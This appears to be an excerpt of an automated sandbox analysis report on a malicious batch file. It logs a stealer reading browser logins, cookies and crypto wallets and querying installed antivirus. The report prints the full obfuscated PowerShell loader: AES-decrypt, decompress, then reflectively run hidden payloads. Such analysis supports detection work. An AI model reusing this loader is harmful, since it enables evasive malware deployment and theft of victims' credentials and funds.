Source: tmpEBDE.tmp.3.dr Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: tmpEBDE.tmp.3.dr Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: tmpEBDE.tmp.3.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: tmpEBDE.tmp.3.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: tmpEBDE.tmp.3.dr Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: tmpEBDE.tmp.3.dr Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: tmpEBDE.tmp.3.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: tmpEBDE.tmp.3.dr Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\z52PO0048857.cmd';$BczT='GeRVWptRVWpCRVWpurRVWpreRVWpntRVWpPRVWproRVWpcRVWpessRVWp'.Replace('RVWp', ''),'SpdpWdlitdpWd'.Replace('dpWd', ''),'EntUUZwrUUZwyPUUZwoUUZwinUUZwtUUZw'.Replace('UUZw', ''),'ElmNutemNutmmNutentmNutAtmNut'.Replace('mNut', ''),'LoZlRdadZlRd'.Replace('ZlRd', ''),'FriYMJomiYMJBiYMJasiYMJe64iYMJStiYMJriiYMJngiYMJ'.Replace('iYMJ', ''),'CDTtzhaDTtznDTtzgeDTtzExDTtzteDTtznsDTtzioDTtznDTtz'.Replace('DTtz', ''),'TrUPQEanUPQEsfUPQEormUPQEFUPQEiUPQEnUPQEalUPQEBUPQElocUPQEkUPQE'.Replace('UPQE', ''),'IqNQJnvqNQJoqNQJkeqNQJ'.Replace('qNQJ', ''),'CoqEENpqEENyqEENToqEEN'.Replace('qEEN', ''),'CrehWBeaehWBteehWBDehWBeehWBcehWBrypehWBtorehWB'.Replace('ehWB', ''),'MaQHwVinQHwVModQHwVuQHwVleQHwV'.Replace('QHwV', ''),'ReoviQadLoviQinoviQeoviQsoviQ'.Replace('oviQ', ''),'Devonzcomvonzpvonzrevonzssvonz'.Replace('vonz', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($BczT[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function pWQul($PgjTo){$ArRhZ=[System.Security.Cryptography.Aes]::Create();$ArRhZ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ArRhZ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ArRhZ.Key=[System.Convert]::($BczT[5])('BCbtvIveY0T0lkWSkDxWOMe/c90s1PvXXJN390CRmts=');$ArRhZ.IV=[System.Convert]::($BczT[5])('JbfpGWq+SHjQD2Awma012A==');$BcXUN=$ArRhZ.($BczT[10])();$RcqyN=$BcXUN.($BczT[7])($PgjTo,0,$PgjTo.Length);$BcXUN.Dispose();$ArRhZ.Dispose();$RcqyN;}function iDUTr($PgjTo){$bKrDu=New-Object System.IO.MemoryStream(,$PgjTo);$gnvgt=New-Object System.IO.MemoryStream;$atXgD=New-Object System.IO.Compression.GZipStream($bKrDu,[IO.Compression.CompressionMode]::($BczT[13]));$atXgD.($BczT[9])($gnvgt);$atXgD.Dispose();$bKrDu.Dispose();$gnvgt.Dispose();$gnvgt.ToArray();}$XZgdm=[System.IO.File]::($BczT[12])([Console]::Title);$IbVAd=iDUTr (pWQul ([Convert]::($BczT[5])([System.Linq.Enumerable]::($BczT[3])($XZgdm, 5).Substring(2))));$AAuWz=iDUTr (pWQul ([Convert]::($BczT[5])([System.Linq.Enumerable]::($BczT[3])($XZgdm, 6).Substring(2))));[System.Reflection.Assembly]::($BczT[4])([byte[]]$AAuWz).($BczT[2]).($BczT[8])($null,$null);[System.Reflection.Assembly]::($BczT[4])([byte[]]$IbVAd).($BczT[2]).($BczT[8])($null,$null); " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\z52po0048857.cmd';$bczt='gervwptrvwpcrvwpurrvwprervwpntrvwpprvwprorvwpcrvwpessrvwp'.replace('rvwp', ''),'spdpwdlitdpwd'.replace('dpwd', ''),'entuuzwruuzwypuuzwouuzwinuuzwtuuzw'.replace('uuzw', ''),'elmnutemnutmmnutentmnutatmnut'.replace('mnut', ''),'lozlrdadzlrd'.replace('zlrd', ''),'friymjomiymjbiymjasiymje64iymjstiymjriiymjngiymj'.replace('iymj', ''),'cdttzhadttzndttzgedttzexdttztedttznsdttziodttzndttz'.replace('dttz', ''),'trupqeanupqesfupqeormupqefupqeiupqenupqealupqebupqelocupqekupqe'.replace('upqe', ''),'iqnqjnvqnqjoqnqjkeqnqj'.replace('qnqj', ''),'coqeenpqeenyqeentoqeen'.replace('qeen', ''),'crehwbeaehwbteehwbdehwbeehwbcehwbrypehwbtorehwb'.replace('ehwb', ''),'maqhwvinqhwvmodqhwvuqhwvleqhwv'.replace('qhwv', ''),'reoviqadloviqinoviqeoviqsoviq'.replace('oviq', ''),'devonzcomvonzpvonzrevonzssvonz'.replace('vonz', '');powershell -w hidden;$modules=[system.diagnostics.process]::($bczt[0])().modules;if ($modules -match 'hmpalert.dll') { exit; };function pwqul($pgjto){$arrhz=[system.security.cryptography.aes]::create();$arrhz.mode=[system.security.cryptography.ciphermode]::cbc;$arrhz.padding=[system.security.cryptography.paddingmode]::pkcs7;$arrhz.key=[system.convert]::($bczt[5])('bcbtvivey0t0lkwskdxwome/c90s1pvxxjn390crmts=');$arrhz.iv=[system.convert]::($bczt[5])('jbfpgwq+shjqd2awma012a==');$bcxun=$arrhz.($bczt[10])();$rcqyn=$bcxun.($bczt[7])($pgjto,0,$pgjto.length);$bcxun.dispose();$arrhz.dispose();$rcqyn;}function idutr($pgjto){$bkrdu=new-object system.io.memorystream(,$pgjto);$gnvgt=new-object system.io.memorystream;$atxgd=new-object system.io.compression.gzipstream($bkrdu,[io.compression.compressionmode]::($bczt[13]));$atxgd.($bczt[9])($gnvgt);$atxgd.dispose();$bkrdu.dispose();$gnvgt.dispose();$gnvgt.toarray();}$xzgdm=[system.io.file]::($bczt[12])([console]::title);$ibvad=idutr (pwqul ([convert]::($bczt[5])([system.linq.enumerable]::($bczt[3])($xzgdm, 5).substring(2))));$aauwz=idutr (pwqul ([convert]::($bczt[5])([system.linq.enumerable]::($bczt[3])($xzgdm, 6).substring(2))));[system.reflection.assembly]::($bczt[4])([byte[]]$aauwz).($bczt[2]).($bczt[8])($null,$null);[system.reflection.assembly]::($bczt[4])([byte[]]$ibvad).($bczt[2]).($bczt[8])($null,$null); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /s /d /c" echo $host.ui.rawui.windowtitle='c:\users\user\desktop\z52po0048857.cmd';$bczt='gervwptrvwpcrvwpurrvwprervwpntrvwpprvwprorvwpcrvwpessrvwp'.replace('rvwp', ''),'spdpwdlitdpwd'.replace('dpwd', ''),'entuuzwruuzwypuuzwouuzwinuuzwtuuzw'.replace('uuzw', ''),'elmnutemnutmmnutentmnutatmnut'.replace('mnut', ''),'lozlrdadzlrd'.replace('zlrd', ''),'friymjomiymjbiymjasiymje64iymjstiymjriiymjngiymj'.replace('iymj', ''),'cdttzhadttzndttzgedttzexdttztedttznsdttziodttzndttz'.replace('dttz', ''),'trupqeanupqesfupqeormupqefupqeiupqenupqealupqebupqelocupqekupqe'.replace('upqe', ''),'iqnqjnvqnqjoqnqjkeqnqj'.replace('qnqj', ''),'coqeenpqeenyqeentoqeen'.replace('qeen', ''),'crehwbeaehwbteehwbdehwbeehwbcehwbrypehwbtorehwb'.replace('ehwb', ''),'maqhwvinqhwvmodqhwvuqhwvleqhwv'.replace('qhwv', ''),'reoviqadloviqinoviqeoviqsoviq'.replace('oviq', ''),'devonzcomvonzpvonzrevonzssvonz'.replace('vonz', '');powershell -w hidden;$modules=[system.diagnostics.process]::($bczt[0])().modules;if ($modules -match 'hmpalert.dll') { exit; };function pwqul($pgjto){$arrhz=[system.security.cryptography.aes]::create();$arrhz.mode=[system.security.cryptography.ciphermode]::cbc;$arrhz.padding=[system.security.cryptography.paddingmode]::pkcs7;$arrhz.key=[system.convert]::($bczt[5])('bcbtvivey0t0lkwskdxwome/c90s1pvxxjn390crmts=');$arrhz.iv=[system.convert]::($bczt[5])('jbfpgwq+shjqd2awma012a==');$bcxun=$arrhz.($bczt[10])();$rcqyn=$bcxun.($bczt[7])($pgjto,0,$pgjto.length);$bcxun.dispose();$arrhz.dispose();$rcqyn;}function idutr($pgjto){$bkrdu=new-object system.io.memorystream(,$pgjto);$gnvgt=new-object system.io.memorystream;$atxgd=new-object system.io.compression.gzipstream($bkrdu,[io.compression.compressionmode]::($bczt[13]));$atxgd.($bczt[9])($gnvgt);$atxgd.dispose();$bkrdu.dispose();$gnvgt.dispose();$gnvgt.toarray();}$xzgdm=[system.io.file]::($bczt[12])([console]::title);$ibvad=idutr (pwqul ([convert]::($bczt[5])([system.linq.enumerable]::($bczt[3])($xzgdm, 5).substring(2))));$aauwz=idutr (pwqul ([convert]::($bczt[5])([system.linq.enumerable]::($bczt[3])($xzgdm, 6).substring(2))));[system.reflection.assembly]::($bczt[4])([byte[]]$aauwz).($bczt[2]).($bczt[8])($null,$null);[system.reflection.assembly]::($bczt[4])([byte[]]$ibvad).($bczt[2]).($bczt[8])($null,$null); " Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: dump.pcap, type: PCAP
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\atomic\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Guarda\ Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\ Jump to behavior

Remote Access Functionality

barindex
Source: Yara match File source: dump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs